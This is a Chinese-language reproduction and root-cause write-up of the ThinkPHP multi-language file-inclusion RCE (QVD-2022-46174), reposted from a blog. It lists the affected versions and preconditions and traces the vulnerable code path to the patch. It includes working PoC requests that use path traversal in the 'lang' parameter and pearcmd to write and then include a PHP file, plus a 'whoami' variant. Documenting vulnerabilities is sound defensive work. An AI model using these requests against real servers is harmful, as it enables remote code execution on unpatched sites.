ThinkPHP多语言文件包含RCE(QVD-2022-46174)
漏洞范围
- v6.0.0<=ThinkPHP<=v6.0.13
- v5.0.0<=ThinkPHP<=5.0.12
- v5.1.0<=ThinkPHP<=5.1.8
需开启多语言选项,以thinkPHP6版本为例
- 在自定义中间件定义文件app/middleware.php中添加\think\middleware\LoadLangPack::class
php需安装pearcmd拓展,并且开启了register_argc_argv选项
在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在
/usr/local/lib/php
漏洞复现
环境
使用vulfocus/thinkphp:6.0.12镜像搭建docker环境
poc
#写文件/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=phpinfo()?>+/tmp/hello.php#文件包含/public/index.php?lang=../../../../../../../../tmp/hello
还有一种是
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami并没有尝试成功,好像也是需要利用pearcmd写文件到extend目录还需要一个自定义拓展的样子总感觉怪怪的,参考:【漏洞报送】ThinkPHP开发框架存在命令执行漏洞
原理
- 多语言组件导致的文件包含+pear写文件
查看官方文档关于多语言的解释可见:会首先检查请求的URL或者Cookie中是否包含语言变量
查看新版本补丁可见ThinkPHP5中新增合法性检查
ThinkPHP6新版本补丁\think\middleware\LoadLangPack::detect`中增加了对url、Header、Cookie中设置语言的合法性检查
下面代码分析以ThinkPHP6为例。
\think\middleware\LoadLangPack::handle方法会被自动加载(中间件的入口执行方法)
在detect方法中设置语言之后进入\think\Lang::switchLangSet进行语言切换,路径直接拼接而成
进入\think\Lang::load进行加载,如果文件存在则调用\think\Lang::parse解析
参考
https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099
thinkphp6_0/1037637](https://www.kancloud.cn/manual/thinkphp6_0/1037637)
https://www.kancloud.cn/manual/thinkphp6_0/1037493
来源地址:https://blog.csdn.net/weixin_43610673/article/details/128638095
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
